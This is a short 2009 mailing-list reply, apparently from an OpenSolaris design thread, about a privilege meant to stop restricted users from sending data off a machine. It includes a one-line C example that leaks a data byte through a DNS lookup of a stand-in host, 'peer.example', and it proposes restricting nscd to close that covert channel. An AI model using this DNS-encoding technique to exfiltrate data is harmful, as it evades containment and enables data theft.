On Thu, Dec 24, 2009 at 10:43:53AM +0100, Casper.Dik at Sun.COM wrote:
> >John Plocher wrote:
> >> What is the basic use case for this priv?
>
> It is also possible to contain users in a "can't break out" shell; they
> can run their application but they cannot copy data outside of the machine.
To be fair, if you allow name service calls, with nscd doing the
networking, you have a subliminal channel...
if (gethostbyname("byte0is123.docFOO.peer.example") != NULL)
/* peer got the message */
nscd could, of course, see that a client lacks this basic privilege and
limit the caller to queries against the files backend. We should
consider doing that.
Nico
--
